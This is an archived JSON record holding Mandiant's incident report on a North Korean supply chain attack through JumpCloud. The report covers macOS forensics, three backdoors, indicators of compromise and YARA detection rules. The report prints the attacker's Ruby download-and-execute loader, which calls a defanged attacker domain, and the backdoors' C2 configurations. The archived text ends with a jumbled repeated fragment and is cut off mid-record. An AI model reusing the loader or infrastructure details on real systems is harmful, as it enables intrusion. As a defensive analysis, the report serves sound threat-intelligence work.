{
	"id": "6aabeaf8-001a-414e-8eab-71ffed2ff964",
	"created_at": "2026-04-06T00:12:25.021744Z",
	"updated_at": "2026-04-10T03:38:19.317419Z",
	"deleted_at": null,
	"sha1_hash": "25d1e0f161e755fb43a986a32487aaeaf06aa589",
	"title": "North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 257379,
	"plain_text": "North Korea Leverages SaaS Provider in a Targeted Supply Chain\r\nAttack | Mandiant\r\nBy Mandiant\r\nPublished: 2023-07-24 · Archived: 2026-04-05 17:49:51 UTC\r\nWritten by: Austin Larsen, Dan Kelly, Joseph Pisano, Mark Golembiewski, Matt Williams, Paige Godvin\r\nIn July 2023, Mandiant Consulting responded to a supply chain compromise affecting a US-based software solutions entity.\r\nWe believe the compromise ultimately began as a result of a sophisticated spear phishing campaign aimed at JumpCloud, a\r\nzero-trust directory platform service used for identity and access management. JumpCloud reported this unauthorized access\r\nimpacted fewer than five customers and less than 10 devices. The details in this blog post are based on Mandiant’s\r\ninvestigation into the attack against one of JumpCloud’s impacted customers.\r\nMandiant attributed these intrusions to UNC4899, a Democratic People's Republic of Korea (DPRK)-nexus actor, with a\r\nhistory of targeting companies within the cryptocurrency vertical. Mandiant assesses with high confidence that UNC4899 is\r\na cryptocurrency-focused element within the DPRK's Reconnaissance General Bureau (RGB). Based on reporting from\r\ntrusted partners, UNC4899 likely corresponds to TraderTraitor, a financially motivated DPRK threat group that primarily\r\ntargets blockchain-related companies.\r\nSupply Chain Attack\r\nOn June 27, 2023, at 18:51:57 UTC, Mandiant identified a malicious Ruby script executed via the JumpCloud agent at a\r\ndownstream customer (a software solutions entity). JumpCloud confirmed the commands framework was used for malicious\r\ndata injections in their security incident disclosure. The contents and functionalities of this script are outlined below in the\r\nBackdoor Payloads section. 
\r\nHost Artifacts\r\nEvidence of compromise was observed within the JumpCloud agent log located at the file\r\npath  /private/var/log/jcagent.log .\r\nMandiant observed log entries in jcagent.log that indicated a directive named “Runworkflow” triggered execution on the\r\nsystem:\r\ntime=2023-06-27 18:51:57.415615-07:00 PID=82291 level=warning msg=Fallback Poll was required to handle the following dire\r\ntime=2023-06-27 18:51:57.416036-07:00 PID=82291 level=info msg=policies manager received a request to update workflow poli\r\ntime=2023-06-27 18:51:57.416145-07:00 PID=82291 level=info msg=removeWorkflowPolicies - Removing isExecuteOnGUILogin workf\r\ntime=2023-06-27 18:51:57.416192-07:00 PID=82291 level=info msg=updateWorkflowPolicies - Adding all current workflow polici\r\ntime=2023-06-27 18:51:57.416238-07:00 PID=82291 level=info msg=Processing TypeScheduleCron\r\n \r\ntime=2023-06-27 18:51:57.416308-07:00 PID=82291 level=info msg=Policy manager creating schedule cron monitor ID=\u003cID\u003e name\r\ntime=2023-06-27 18:51:57.416550-07:00 PID=82291 level=info msg=policies manager received a request to apply Workflow polic\r\nDuring the investigation, Mandiant observed the threat actor target four (4) OSX Ventura systems running either versions\r\n13.3 or 13.4.1. During the forensic analysis of these systems, Mandiant identified a relatively new forensic artifact that\r\nproved extremely valuable to the investigation.\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 1 of 11\n\nThis forensic artifact is related to Apple’s XProtect services, specifically, the XProtect Behavioral Service. There are\r\ncurrently five behavioral-based rules defined by Apple. Information about executed programs that violate one or more of\r\nthese rules is recorded in the XProtect Database (XPdb), which is stored in SQLite 3 format and located at\r\n/var/protected/xprotect/XPdb . 
At this time, it does not appear that the XProtect Behavioral Service is configured to\r\nblock execution.\r\nThrough analysis of data stored in the XPdb, Mandiant identified entries containing specific signing identifiers that\r\ncorrelated to attacker payloads. Specifically, the exec_signing_id field within the XPdb contains information about the\r\nsignature of the binary, which can be used to help identify the author of a particular signed binary. Mandiant identified three\r\nunique signatures associated with malicious files: \r\nmac-555549440ea0d64e96bb34428e08cc8d948b40e7\r\np-macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7\r\nsecurityd-555549440fca1d2f1e613094b0c768d393f83d7f\r\nMandiant used these signatures to search the XPdb for additional attacker payloads that were deleted by the threat actor or\r\notherwise unable to be identified through other forms of analysis.\r\nAn additional field of interest in the XPdb was the exec_cdhash, which contains the cdhash, or Code Directory hash, of the\r\nexecuted binaries. Mandiant identified the historical execution of malicious binaries across multiple systems using cdhash\r\nvalues stored in the XPdb. Because the cdhash is computed based on executable code in the application, Mandiant was able\r\nto identify additional malware in the environment despite the files being deleted by the threat actor and the samples having\r\ndifferent file hashes.\r\nFurther fields of interest in the XPdb had the prefix “responsible_” and contained information about the parent of the\r\nprocess which violated the behavioral rules. On multiple systems, XPdb entries for the malware contained the parent process\r\nof the JumpCloud agent, further evidence that the threat actor leveraged JumpCloud to gain initial access to victim\r\nenvironments.\r\nThe threat actor was consistently observed removing prior payloads from disk; however, the FSEvents artifacts were able to\r\nprovide great insight into files that previously existed on disk. 
The FSEvents contained details on the creation, modification,\r\npermission changes, renaming, and removal of files, even where the filesystem no longer contained any trace that\r\nthose files had existed. Using the node_id field associated with individual entries, Mandiant was able to identify\r\nthe order of specific threat actor activities on systems and the updated names of renamed files.\r\nThe following table provides an example of the relevant data obtained from FSEvents:\r\nnode_id fullpath Description\r\n53789510 /Library/Ruby/Gems/2.6.0/extensions/init.rb Ruby script\r\n53789519 /usr/local/bin/com.docker.vmnat FULLHOUSE.DOORED\r\n53789522 /usr/local/bin/com.docker.vmnat.lock Not recovered\r\n54101444 /Library/Fonts/ArialUnicode.ttf.md5 STRATOFEAR (Config)\r\n54102142 /Library/PrivilegedHelperTools/com.microsoft.teams.TeamsDaemon STRATOFEAR\r\n54102142 /Library/PrivilegedHelperTools/us.zoom.ZoomService STRATOFEAR\r\n54102303 /Library/LaunchDaemons/com.microsoft.teams.TeamsDaemon.plist STRATOFEAR (LaunchDaemon)\r\n54212385 /Library/LaunchDaemons/us.zoom.ZoomService.plist STRATOFEAR (LaunchDaemon)\r\nBackdoor Payloads\r\nInitial Access\r\nInitial access was gained by compromising JumpCloud and inserting malicious code into their commands framework. In at\r\nleast one instance, the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent. The script\r\ncontained instructions to download and execute a second stage payload. Within 24 hours of gaining initial access to systems\r\nin the victim environment, the threat actor deployed additional backdoors and established persistence via plists. The initial\r\npayloads and second stage backdoors were removed from the system.\r\nThe directory choices and naming conventions of the Ruby script and second stage payloads indicated the threat actor placed\r\nsignificant priority on masquerading as legitimate files and applications. 
\r\nMandiant retrieved the lightweight Ruby script named init.rb that was deployed to multiple systems:\r\nrequire 'open-uri'\r\nffn = '/usr/local/bin/com.docker.vmnat'\r\nFile.open(ffn, 'wb') do |file|\r\nfile.write(open('hxxps://primerosauxiliosperu[.]com/lic.dat').read)\r\nend\r\nsleep(1)\r\nFile.chmod(0755, ffn)\r\nfn = '/usr/local/bin/com.docker.vmnat.lock'\r\nFile.open(fn, 'wb') do |file|\r\nfile.write(open('hxxps://primerosauxiliosperu[.]com/lic_bak.dat').read)\r\nend\r\nsleep(1)\r\nsystem(ffn)\r\nThe script downloads two files to locations defined by the variables ffn and fn, but only the first file is executed via the\r\nsystem function. The second file could not be identified on the hosts.\r\nFULLHOUSE.DOORED (com.docker.vmnat, npx-cli, us.zoom.ZoomUpdate)\r\nThe threat actor downloaded and executed /usr/local/bin/com.docker.vmnat using the aforementioned Ruby script.\r\nHowever, com.docker.vmnat was removed from the system. Fortunately, an artifact of its execution was discovered in the\r\n/private/var/db/oah directory. \r\nBecause com.docker.vmnat was likely compiled for x86-64 systems, the code had to be translated to ARM64 to successfully\r\nexecute on the target system. As a result, Apple’s Rosetta 2 translator produced a com.docker.vmnat.aot file under the oah\r\ndirectory that included the translated ARM64 code as well as symbols present in the original com.docker.vmnat\r\napplication. Based on these symbols, Mandiant assesses with moderate confidence that com.docker.vmnat was a version of\r\nthe FULLHOUSE.DOORED backdoor. \r\nFULLHOUSE.DOORED is a backdoor written in C/C++ that communicates using HTTP. It incorporates the capabilities of\r\nthe FULLHOUSE tunneler in addition to supporting backdoor commands including shell command execution, file transfer,\r\nfile management, and process injection. 
The command and control (C2) server must be configured from either the command\r\nline or a configuration file.\r\nAdditional attacker backdoors were identified on systems with names that masqueraded as legitimate binaries; these also produced\r\nAOT files upon translation (e.g., npx-cli and npx-cli.aot).\r\nSTRATOFEAR (com.google.kservice, us.zoom.ZoomService)\r\nLimited forensic evidence existed to determine exactly how STRATOFEAR was deployed to systems in the victim\r\nenvironment; however, in each instance, STRATOFEAR was preceded by the deployment of FULLHOUSE.DOORED. On\r\nthe systems analyzed, only one backdoor remained on the system, indicating the threat actor may have used\r\nFULLHOUSE.DOORED as a first-stage backdoor before deploying STRATOFEAR as a second-stage backdoor.\r\nSTRATOFEAR is a modular backdoor that communicates with C2 servers using a protocol specified in its C2 configuration,\r\nwhich is decrypted from a local file. The backdoor’s primary functionality involves retrieving and executing additional\r\nmodules. Modules may be downloaded from a remote server or loaded from disk.\r\nSTRATOFEAR contains an embedded configuration that includes two file paths. The first path\r\n( /Library/Fonts/ArialUnicode.ttf.md5 ) stores the backdoor’s full configuration, including its C2 servers. 
The second\r\npath ( /Library/Fonts/ArialUnicode.ttf.md5.1 ) may be used to store logging information related to monitor activity that\r\nis described as follows.\r\nA portion of STRATOFEAR’s 0x1052-byte decrypted configuration is shown as follows.\r\n00000410 25 63 01 00 00 00 E8 03 00 00 03 00 00 00 02 00 %c....è.........\r\n00000420 00 00 65 6D 62 65 64 3A 2F 2F 30 00 00 00 00 00 ..embed://0.....\r\n00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000004E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 3 of 11\n\n000004F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000520 00 00 00 00 00 00 70 73 73 6C 3A 2F 2F 63 6F 6E ......pssl://con\r\n00000530 74 6F 72 74 6F 6E 73 65 74 2E 63 6F 6D 3A 34 34 tortonset.com:44\r\n00000540 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3...............\r\n00000550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000560 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 ................\r\n00000570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000005F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000620 00 00 00 00 00 00 00 00 00 00 70 73 73 6C 3A 2F ..........pssl:/\r\n00000630 2F 72 65 6C 79 73 75 64 64 65 6E 2E 63 6F 6D 3A /relysudden.com:\r\n00000640 34 34 33 00 00 00 00 00 00 00 00 00 00 00 00 00 443.............\r\nSTRATOFEAR refers to the four-byte value at offset 0x410 ( 0x16325 ) as a uid. The four-byte value at offset 0x416\r\n( 0x3e8 or decimal 1000 ) is the backdoor’s version number. 
STRATOFEAR’s configuration file may include AES-128-encrypted\r\nmodules; however, this was not the case in the discovered sample.\r\nA subset of the commands supported by STRATOFEAR is listed in the following table:\r\nCommand ID Description\r\n0x02 Start the primary module thread (see the following module command table)\r\n0x07 Collect system information, module information, and configuration data\r\n0x08 Read and decrypt the local configuration file\r\n0x09 Write the in-memory configuration to the local configuration file\r\n0x0A Delete the local configuration file\r\n0x0B Get the path of the local configuration file\r\n0x0C Retrieve the in-memory configuration\r\nSystem information collected using command 0x07 includes the system name, current username, and the system’s\r\narchitecture.\r\nSTRATOFEAR supports the module-related commands listed in the following table:\r\nCommand ID Description\r\n0x60 Not implemented\r\n0x61 Retrieve module information: name, ID, version, memory address\r\n0x62 Load module from memory or disk and execute its Initialize function\r\n0x63 Invoke module by ID\r\n0x64 Retrieve module execution result\r\n0x65 Retrieve module start and end values\r\n0x66 Change directory\r\nDownloaded modules may be written to a .tmp file in the $TMPDIR or /tmp directory. The file’s name consists of six\r\nrandomly-generated alphanumeric characters.\r\nSTRATOFEAR’s code references five predefined module types that have an ID value and an internal name:\r\nModule ID Internal Name\r\n1 module_ipc\r\n2 module_monitor\r\n3 module_apu\r\n4 module_event\r\n5 module_net\r\nSTRATOFEAR also contains strings that are used to report a module’s location. Possible locations are “Config”,\r\n“Static”, or “Path” followed by a file path.\r\nSTRATOFEAR employs what it refers to as “monitors” to monitor system activity using up to 16 threads. 
The backdoor\r\nreferences eight different monitors and includes descriptions for all but one ( 0x45 ).\r\nMonitor\r\nID\r\nInternal Description\r\n0x42 \"monitor for when file(%s) is created\"\r\n0x43 \"monitor for when size of file(%s) is changed\"\r\n0x44 \"monitor for when status of network connection(%s:%d =\u003e %s:%d) is created\"\r\n0x45\r\nNone. This monitor can test for a successful TCP connection to a given IP address or domain using a\r\nspecified port.\r\n0x46 \"monitor for when process(%s) is created\"\r\n0x47 \"monitor for when new device is mounted\"\r\n0x48 \"monitor for when new session is activated\"\r\n0x49 \"monitor for when it is waked up after %d minutes\"\r\nMandiant directly observed one (1) variant of STRATOFEAR as a Mach-O executable compiled for ARM64 systems that\r\ncontained a self-signed certificate with a particular Common Name (CN). Mandiant identified a second sample on\r\nVirusTotal with the same self-signed certificate CN. The second sample is a Windows DLL protected using VMProtect that\r\nwas first submitted to VirusTotal on October 19, 2022. Mandiant assesses with moderate confidence that the DLL is a\r\nWindows version of STRATOFEAR.\r\nTIEDYE (xpc.protect)\r\nLimited forensic evidence existed to determine exactly how TIEDYE was deployed to systems in the victim environment;\r\nhowever, like STRATOFEAR, TIEDYE was likely deployed as a second-stage backdoor by FULLHOUSE.DOORED. \r\nA Mach-O executable named xpc.protect was identified and determined to be an evolution of the TIEDYE backdoor.\r\nTIEDYE can communicate with a C2 server using a range of supported protocols described as follows. 
Its capabilities\r\ninclude retrieving and executing additional payloads, collecting basic system information, and executing shell commands.\r\nA portion of TIEDYE’s raw configuration is shown as follows:\r\n00000000 00 00 01 E3 00 0E 00 1E 00 00 00 04 00 03 00 20 ...ã...........\r\n00000010 00 10 56 E6 00 00 00 04 00 03 00 21 00 00 00 05 ..Væ.......!....\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 5 of 11\n\n00000020 00 00 00 7D 00 0D 00 33 00 00 00 37 00 0E 00 00 ...}...3...7....\r\n00000030 00 00 00 17 00 0C 00 34 73 73 6C 3A 2F 2F 62 61 .......4ssl://ba\r\n00000040 73 6B 65 74 73 61 6C 75 74 65 2E 63 6F 6D 00 00 sketsalute.com..\r\n00000050 00 00 04 00 03 00 35 00 00 00 00 00 00 00 04 00 ......5.........\r\n00000060 03 00 36 00 00 00 00 00 00 00 36 00 0E 00 00 00 ..6.......6.....\r\n00000070 00 00 16 00 0C 00 34 73 73 6C 3A 2F 2F 72 65 6E ......4ssl://ren\r\n00000080 74 65 64 70 75 73 68 79 2E 63 6F 6D 00 00 00 00 tedpushy.com....\r\n00000090 04 00 03 00 35 00 00 00 00 00 00 00 04 00 03 00 ....5...........\r\n000000A0 36 00 00 00 00 00 00 00 04 00 03 00 23 00 00 00 6...........#...\r\n000000B0 0A 00 00 01 08 00 0D 00 24 00 00 00 24 00 0E 00 ........$...$...\r\n000000C0 00 00 00 00 04 00 03 00 25 00 00 03 E8 00 00 00 ........%...è...\r\n000000D0 04 00 03 00 26 00 00 00 00 00 00 00 04 00 03 00 ....\u0026...........\r\n000000E0 27 00 00 00 00 00 00 00 24 00 0E 00 00 00 00 00 '.......$.......\r\n000000F0 04 00 03 00 25 00 00 03 E9 00 00 00 04 00 03 00 ....%...é.......\r\n00000100 26 00 00 00 00 00 00 00 04 00 03 00 27 00 00 00 \u0026...........'...\r\n00000110 00 00 00 00 24 00 0E 00 00 00 00 00 04 00 03 00 ....$...........\r\n00000120 25 00 00 03 EA 00 00 00 04 00 03 00 26 00 00 00 %...ê.......\u0026...\r\n00000130 00 00 00 00 04 00 03 00 27 00 00 00 00 00 00 00 ........'.......\r\n00000140 24 00 0E 00 00 00 00 00 04 00 03 00 25 00 00 03 $...........%...\r\n00000150 ED 00 00 00 04 00 03 00 26 00 00 00 00 00 00 00 
í.......\u0026.......\r\n00000160 04 00 03 00 27 00 00 00 00 00 00 00 24 00 0E 00 ....'.......$...\r\n00000170 00 00 00 00 04 00 03 00 25 00 00 00 00 00 00 00 ........%.......\r\n00000180 04 00 03 00 26 00 00 00 00 00 00 00 04 00 03 00 ....\u0026...........\r\n00000190 27 00 00 00 00 00 00 00 24 00 0E 00 00 00 00 00 '.......$.......\r\n000001A0 04 00 03 00 25 00 00 00 00 00 00 00 04 00 03 00 ....%...........\r\n000001B0 26 00 00 00 00 00 00 00 04 00 03 00 27 00 00 00 \u0026...........'...\r\n000001C0 00 00 00 00 22 00 0C 00 37 2F 4C 69 62 72 61 72 ....\"...7/Librar\r\n000001D0 79 2F 43 61 63 68 65 73 2F 63 6F 6D 2E 61 70 70 y/Caches/com.app\r\n000001E0 6C 65 2E 70 72 69 76 61 63 79 00 05 05 05 05 05 le.privacy......\r\nThe configuration contains two C2 servers that are prefixed with a protocol identifier. TIEDYE supports the following\r\nprotocols: tcp, tcp6, udp, upd6, http, https, proxy_socks4, proxy_socks4a, pipe, ssl, ssl3, and rdp.\r\nThe file path at the end of the configuration is used to store configuration data that is encrypted using AES-128.\r\nPrevious versions of TIEDYE were configured to persist via a LaunchAgent. The current version contains the functionality\r\nto create a LaunchAgent at one of the following locations but is not configured to do so:\r\n$HOME/Library/LaunchAgents/com.studentd.agent.plist\r\n/Library/LaunchDaemons/com.studentd.agent.plist\r\nTIEDYE has similarities to RABBITHUNT, which is a backdoor written in C++ that communicates via a custom binary\r\nprotocol over TCP. RABBITHUNT's core functionality is implemented through modules downloaded directly into memory\r\nor read from a local file. Capabilities added via modules include reverse shell, file transfer, process creation, and process\r\ntermination.\r\nDPRK Cryptocurrency Targeting\r\nMandiant identified UNC4899 targeting MacOS keychains and reconnaissance data associated with executives and internal\r\nsecurity teams. 
\r\nUNC4899 targeting overlaps with a separate RGB-aligned group, APT43, which in July 2023 displayed interest in the\r\ncryptocurrency vertical, specifically targeting a variety of C-Suite executives from multiple fintech and cryptocurrency\r\ncompanies in the United States, South Korea, Hong Kong, and Singapore. Many of the individuals work at organizations\r\nrelated to financial services, cryptocurrency, blockchain, web3 and related entities. The overlaps in targeting and sharing of\r\ninfrastructure amongst DPRK groups highlight the continued targeting and coordinated interest in the cryptocurrency field.\r\nOperational Security Fumble\r\nMandiant has observed RGB units utilize a series of Operational Relay Boxes (ORBs) using L2TP IPsec tunnels along with\r\ncommercial VPN providers to obscure their source address. These relays seem to be heavily shared among units under the\r\nRGB umbrella.\r\nMandiant observed UNC4899 utilize various VPN providers as a final hop, the most common being ExpressVPN, but\r\nconnections to NordVPN, TorGuard and many other providers have also been observed. There have been many occasions in\r\nwhich DPRK threat actors did not employ this last hop, or mistakenly did not utilize it while conducting\r\noperations on the victim's network.\r\nThe VPNs used by RGB actors occasionally fail, which reveals the IP addresses of the actor's true origins. Mandiant\r\nobserved the DPRK threat actor UNC4899 connecting directly to an attacker-controlled ORB from their 175.45.178[.]0/24\r\nsubnet (Ryugyong Dong, Pyongyang). Additionally, we observed the DPRK threat actor log directly into a Pyongyang IP\r\nfrom one of their jump boxes. Our evidence supports that this was an OPSEC slip-up since the connection to the North\r\nKorean netblock was short-lived. 
Figure 2 provides an overview of the network infrastructure used in this campaign.\r\nFigure 2: UNC4899 network infrastructure\r\nMandiant also uncovered additional infrastructure because a PTR record was never changed\r\nfrom a previous operation. Mandiant has previously identified the domain wasxxv[.]site being used by North Korean threat\r\nactors. Additionally, the IP address 198.244.135[.]250 is being utilized for another C2 domain prontoposer[.]com while still\r\nhaving a PTR record to the domain previously identified.\r\nAttribution\r\nMandiant is tracking this activity as UNC4899, a suspected North Korean actor. We assess with high confidence that\r\nUNC4899 is a cryptocurrency-focused group that falls under the RGB. UNC4899's targeting is selective, and they have been\r\nobserved gaining access to victim networks through JumpCloud. Mandiant has observed overlap amongst multiple North\r\nKorean groups that fall under the RGB. These groups commonly share infrastructure to complete their actions on objectives.\r\nMandiant has observed UNC2970, APT43, and UNC4899 all utilize similar infrastructure.\r\nMandiant has observed an increase in financially motivated operations by DPRK actors in the past year, particularly those\r\nfocused on the cryptocurrency industry. RGB-aligned crypto-focused groups, publicly reported under the umbrella term\r\nLazarus, and clear variants of historic, established APT threat actors such as the open source “TraderTraitor” and\r\n“AppleJeus”, have increasingly conducted financially motivated operations that have affected the cryptocurrency industry\r\nand various blockchain platforms. 
\r\nOutlook and Implications\r\nThe campaign targeting JumpCloud, and the previously reported DPRK supply chain compromise from earlier this year\r\nwhich affected the Trading Technologies X_TRADER application and 3CX Desktop App software, exemplify the\r\ncascading effects of these operations to gain access to service providers in order to compromise downstream victims. Both\r\noperations have suspected ties to financially motivated DPRK actors, suggesting that DPRK operators are implementing\r\nsupply chain TTPs to target select entities as part of increased efforts to target cryptocurrency and fintech-related assets.\r\nMandiant assesses DPRK cryptocurrency units will continue development of MacOS malware and capabilities to target\r\nhigh-value individuals within the cryptocurrency industry, and the software solutions they use.\r\nMandiant assesses that DPRK’s cyber landscape has evolved to a streamlined alignment with shared tooling and targeting\r\nefforts. Operators within these units quickly change their current focus and begin working on separate unrelated efforts such\r\nas ransomware, weapons and nuclear targeting, cryptocurrency efforts, etc. This seeming “streamlining” of activities by\r\nDPRK often makes it difficult for defenders to track, attribute, and thwart malicious activities, while enabling this now\r\ncollaborative adversary to move stealthily and with greater speed. The level of shared targeting and tooling leads Mandiant\r\nto believe that shifts are continuing to occur even outside of the heavily RGB-dominated cyber landscape.\r\nAcknowledgements\r\nBeyond the listed authors are many Mandiant professionals whom we would like to thank for their continued effort and\r\ndedication in working with our clients to respond to DPRK-related intrusions. We also want to specifically thank Google’s\r\nThreat Analysis Group (TAG), Mandiant’s DPRK Fusion Cell, and our government partners for their continued\r\ncollaboration and support. 
We would also like to thank Trellix for our continued partnership and for providing supporting\r\ndetection YARA rules and associated indicators.\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nIP Address ASN Netblock Location\r\n146.19.173.125 213373 IP Connect Inc Seychelles\r\n23.227.202.54 29802 HIVELOCITY, Inc. Tampa, FL, US\r\n38.132.124.88 9009 M247 Europe Secaucus, NJ, US\r\n88.119.174.148 61272 BaCloud Lithuania\r\n198.244.135.250 16276 OVH United Kingdom (GB)\r\nDomain\r\ncontortonset[.]com\r\nrelysudden[.]com\r\nprimerosauxiliosperu[.]com\r\nrentedpushy[.]com\r\nbasketsalute[.]com\r\nprontoposer[.]com\r\nXPdb IOCs\r\nFilename exec_signing_id exec_cdhash\r\nus.zoom.ZoomUpdate mac-555549440ea0d64e96bb34428e08cc8d948b40e7 e5d42bee74a1e1813e8aad9a46a5ebc219953926\r\nnpx-cli mac-555549440ea0d64e96bb34428e08cc8d948b40e7 e5d42bee74a1e1813e8aad9a46a5ebc219953926\r\ncom.docker.vmnat mac-555549440ea0d64e96bb34428e08cc8d948b40e7 e5d42bee74a1e1813e8aad9a46a5ebc219953926\r\ncom.google.kservice p-macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7 ff975b95cfc65b6d19ca18993322cfeed282de04\r\nxpc.protect securityd-555549440fca1d2f1e613094b0c768d393f83d7f c1fc3213bdb8f3139fd5d4b13e242441016c3c84\r\nDetection Rules\r\nYARA\r\nrule M_APT_Backdoor_STRATOFEAR_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects instances of STRATOFEAR\"\r\n md5 = \"6d8194c003d0025fa92fbcbf2eadb6d1\"\r\n platform = \"OSX, Win64\"\r\n malware_family = \"STRATOFEAR\"\r\n strings:\r\n $str1 = \"-alone\" ascii\r\n $str2 = \"-psn\" ascii\r\n $str3 = \"embed://\" ascii\r\n $str4 = \"proc_data\" ascii\r\n $str5 = \"udp://\" ascii\r\n $str6 = \"Path : %s\" ascii\r\n $str7 = \"127.0.0.1\" ascii\r\n condition:\r\n ((uint32(0) == 0xBEBAFECA) or (uint32(0) == 0xFEEDFACE) or (uint32(0) == 0xFEEDFACF) or (uint32(0) == 0xCEFAE\r\n}\r\nrule M_APT_Backdoor_TIEDYE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects instances of TIEDYE\"\r\n md5 = 
\"15bfe67e912f224faef9c7f6968279c6\"\r\n platforms = \"OSX\"\r\n malware_family = \"TIEDYE\"\r\n strings:\r\n $str1 = \"%s/Library/LaunchAgents/com.%s.agent.plist\" ascii\r\n $str2 = \"/Library/LaunchDaemons/com.%s.agent.plist\" ascii\r\n $str3 = \"%s/.plugin%04d.so\" ascii\r\n $str4 = \"sw_vers -productVersion\" ascii\r\n $str5 = \"!proxy=http://\" ascii\r\n $str6 = \"Content-Type: application/octet-stream\" ascii\r\n $str7 = \"\u003ckey\u003eRunAtLoad\u003c/key\u003e\" ascii\r\n $str8 = \"\u003cstring\u003ecom.%s.agent\u003c/string\u003e\" ascii\r\n $str9 = \"%sProxy-Authorization: %s\" ascii\r\n $str10 = \"!udp_type\"\r\n $str11 = \"!http=\"\r\n condition:\r\n ((uint32(0) == 0xBEBAFECA) or (uint32(0) == 0xFEEDFACE) or (uint32(0) == 0xFEEDFACF) or (uint32(0) == 0x\r\n}\r\nrule FE_APT_Backdoor_MacOS_FULLHOUSE_1\r\n{\r\n meta:\r\n author = \"FireEye\"\r\n description = \"Detects instances of FULLHOUSE.\"\r\n platforms = \"OSX\"\r\n malware_family = \"FULLHOUSE\"\r\n strings:\r\n $s1 = /\u003c\\x00%\\x00l?\\x00s\\x00\u003e\\x00\u003c\\x00%\\x00l?\\x00s\\x00\u003e\\x00\u003c\\x00%\\x00l?\\x00s\\x00\u003e/ wide\r\n $sb1 = { E8 [4-32] 83 F8 ?? 
0F 87 [4] 48 8D 0D [4] 48 63 04 81 48 01 C8 FF E0 }\r\n condition:\r\n ((uint32(0) == 0xBEBAFECA) or (uint32(0) == 0xFEEDFACE) or (uint32(0) == 0xFEEDFACF) or (uint32(0) == 0xCEFAEDFE))\r\n}\r\nMandiant Security Validation Actions\r\nVID Name\r\nA106-587 Command and Control - UNC4899, DNS Query, Variant #2\r\nA106-588 Command and Control - UNC4899, DNS Query, Variant #1\r\nA106-589 Command and Control - UNC4899, STRATOFEAR, DNS Query, Variant #1\r\nA106-590 Command and Control - UNC4899, TIEDYE, DNS Query, Variant #1\r\nA106-591 Command and Control - UNC4899, TIEDYE, DNS Query, Variant #2\r\nA106-592 Command and Control - UNC4899, STRATOFEAR, DNS Query, Variant #2\r\nA106-593 Malicious File Transfer - UNC4899, TIEDYE, Download, Variant #1\r\nA106-594 Malicious File Transfer - UNC4899, STRATOFEAR, Download, Variant #1\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 11 of 11\n\ninclude retrieving and A portion of TIEDYE’s executing additional raw configuration payloads, collecting basic is shown as follows: system information, and executing shell commands.\n00000000 00 00 01 E3 00 0E 00 1E 00 00 00 04 00 03 00 20 ...ã...........\n00000010 00 10 56 E6 00 00 00 04 00 03 00 21 00 00 00 05 ..Væ.......!....\n  Page 5 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/north-korea-supply-chain"
	],
	"report_names": [
		"north-korea-supply-chain"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
